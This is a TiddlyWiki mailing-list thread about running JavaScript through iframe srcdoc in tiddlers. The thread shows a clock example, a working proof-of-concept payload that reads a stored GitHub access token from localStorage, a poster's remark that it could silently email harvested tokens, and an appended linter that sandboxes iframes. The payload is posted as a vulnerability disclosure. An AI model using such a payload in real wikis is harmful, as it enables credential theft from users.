cj.v.., 

I don't have much experience with JS macros in TW, but I can imagine it 
would be the same, especially if there is no sanitisation whatsoever. As to 
eliminating iframes, normally there is no way to break out of one. However, 
in the case of my Proof-of-Concept with TW, the localStorage is global, and 
can be accessed by ANY SITE. This is just one more reason I believe TW 
should use browser cookies: they are not accessible from inside an iframe, 
and have more options for security and access.

On Monday, August 16, 2021 at 11:51:35 AM UTC-4 cj.v...@gmail.com wrote:

> It kind of sounds like the iFrame element should then be outright 
> eliminated from the web entirely.
>
> That might be problematic.
>
> Re security, couldn't any tiddler that is a javascript macro be altered 
> for nefarious purposes just as easily as injecting malicious javascript 
> into an iFrame?  
>
> On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote:
>
>> This seems EXTREMELY INSECURE. What is to stop an attacker from injecting 
>> malicious JS into a tiddler, regardless of whether it is "sandboxed"? 
>> Paste this Proof-of-Concept into a blank tiddler. What it does is steal 
>> your GitHub PAT if you have it configured, and alert it to you. While I 
>> have not done it here, I could easily make it both invisible and have it 
>> email me the PATs it gathers.
>>
>> CODE:
>> <$vars vSrcDoc={{{ [[<body><div id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = `<a id="xss" href="javascript:alert('Your GitHub Token is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you probably don\\'t have TW GitHub saving configured');"></a>`; document.getElementById('xss').click();</script></body>]] }}}>
>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>> </$vars>
>>
>> Long story short, an attacker can easily bypass any sanitisation TW 
>> employs, and harvest credentials from various sites. It is my belief that 
>> this issue needs to be fixed immediately, and brought to the attention of 
>> Jeremy and other devs.
>>
>> I would be happy to help on the repair process. I have some experience 
>> with PenTesting and fixing XSS vulnerabilities (mainly in my own 
>> applications). I would recommend adding a listener to TW changes, and 
>> checking for iframe code. If a tiddler does contain it, TW should add a 
>> sandbox constraint on it 
>> (https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox).
>>
>> On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:
>>
>>> Updated one of the tiddlers in the JSON package.  New version attached.
>>>
>>> The addition highlighted below:
>>>
>>> <body>
>>>   <div id="clockDiv"></div>
>>>   <script>
>>> *document.oncontextmenu = function() { *
>>> *    return false; *
>>> *};*
>>>     let clockEl = document.getElementById("clockDiv");
>>> ...
>>>
>>> The reason for the added code:  block access to the back button in the 
>>> iFrame (by blocking access to the entire menu), which winds up performing 
>>> the back button operation on the entire browser page.
>>>
>>> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>>>
>>>> I don't know what made me think of this.
>>>>
>>>> In case this has not been brought up in a while (I doubt this is new to 
>>>> seasoned folk) ...
>>>>
>>>> I was thinking: could I use an iFrame to include simple javascript in a 
>>>> tiddler without getting into macros or plugins that enable javascript.
>>>>
>>>> And, if I could, then could I set things up so that the iFrame is 
>>>> showing javascript dynamically created by the tiddler ?
>>>>
>>>> So here is a way to show a digital clock in TiddlyWiki, for 
>>>> non-programmers who just want to copy and paste javascript code from the 
>>>> web without figuring out how the javascript code works:
>>>>
>>>> Put this in a brand new tiddler:
>>>>
>>>> <$vars vSrcDoc={{{ [[<body> <div id="clockDiv"></div> <script> let clockEl = document.getElementById("clockDiv"); function getClockTime() { let date = new Date(); let hr = date.getHours(); let min = date.getMinutes(); let sec = date.getSeconds(); hr = ("0" + hr).slice(-2); min = ("0" + min).slice(-2); sec = ("0" + sec).slice(-2); clockEl.innerHTML = `${hr}:${min}:${sec}`; } setInterval(getClockTime, 1000); </script></body>]] }}}>
>>>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>>>> </$vars>
>>>>
>>>> Sneaky sneaky, has me wondering what kind of other fun things could be 
>>>> done...
>>>>
>>>

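An added example of the check suggested further up the thread (not TiddlyWiki's own code, and not written by anyone in this thread): a small Node-runnable linter that finds `<iframe>` tags in a tiddler's text and forces an empty `sandbox` attribute on any that lack a restrictive one. A `srcdoc` iframe without `sandbox` runs with the embedding page's origin, which is what lets the proof-of-concept above read the wiki's localStorage; with `sandbox=""` the frame gets an opaque origin and no scripts. The function and constant names (`hardenIframes`, `SAMPLE_POC`, and so on) are assumptions.

```javascript
// Added example, not TiddlyWiki code: a linter that finds <iframe> tags in a
// tiddler's text and forces an empty sandbox attribute on any that lack a
// restrictive one. Names (hardenIframes, SAMPLE_POC, ...) are assumptions.

// Attribute values: quoted, a TiddlyWiki macro call like <<vSrcDoc>>, or bare.
const ATTR_VALUE = String.raw`"[^"]*"|'[^']*'|<<[^>]*>>|[^\s>]+`;
// Opening <iframe ...> tag; group 1 = attribute list, group 2 = self-closing "/".
const IFRAME_TAG = new RegExp(
  String.raw`<iframe\b((?:\s+[^\s=/>]+(?:\s*=\s*(?:${ATTR_VALUE}))?)*)\s*(/?)>`,
  "gi"
);
// A sandbox attribute (with or without a value) inside the attribute list.
const SANDBOX_ATTR = new RegExp(
  String.raw`\s+sandbox(?![^\s=/>])(?:\s*=\s*(${ATTR_VALUE}))?`,
  "i"
);

// Returns the sandbox token string, "" for a bare `sandbox`, or null if absent.
function sandboxValue(attrs) {
  const m = attrs.match(SANDBOX_ATTR);
  if (!m) return null;
  return (m[1] ?? "").replace(/^["']|["']$/g, "");
}

// allow-scripts together with allow-same-origin lets framed content remove its
// own sandbox, so that pair is treated as if no sandbox were present at all.
function isRestrictive(value) {
  const tokens = value.toLowerCase().split(/\s+/).filter(Boolean);
  return !(tokens.includes("allow-scripts") && tokens.includes("allow-same-origin"));
}

// Rewrites every non-restrictive <iframe> to carry sandbox="" (every restriction
// on: no scripts, opaque origin, hence no access to the wiki's localStorage).
function hardenIframes(text) {
  let changed = 0;
  const html = text.replace(IFRAME_TAG, (tag, attrs, selfClose) => {
    const value = sandboxValue(attrs);
    if (value !== null && isRestrictive(value)) return tag; // already safe
    changed += 1;
    const rest = attrs.replace(SANDBOX_ATTR, ""); // drop a weak sandbox, if any
    return `<iframe sandbox=""${rest}${selfClose ? " /" : ""}>`;
  });
  return { html, changed };
}

// Constructed input: the iframe line from the proof-of-concept in this thread.
const SAMPLE_POC =
  '<iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>';

console.log(hardenIframes(SAMPLE_POC));
```

Run it with `node` on a file containing the block; the closing `</iframe>` tag and any other attributes are left untouched, only the opening tag gains `sandbox=""`.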
-- 
You received this message because you are subscribed to the Google Groups 
"TiddlyWiki" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to tiddlywiki+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/tiddlywiki/1a6658ea-0df4-453b-a739-e0025fb9a71fn%40googlegroups.com.
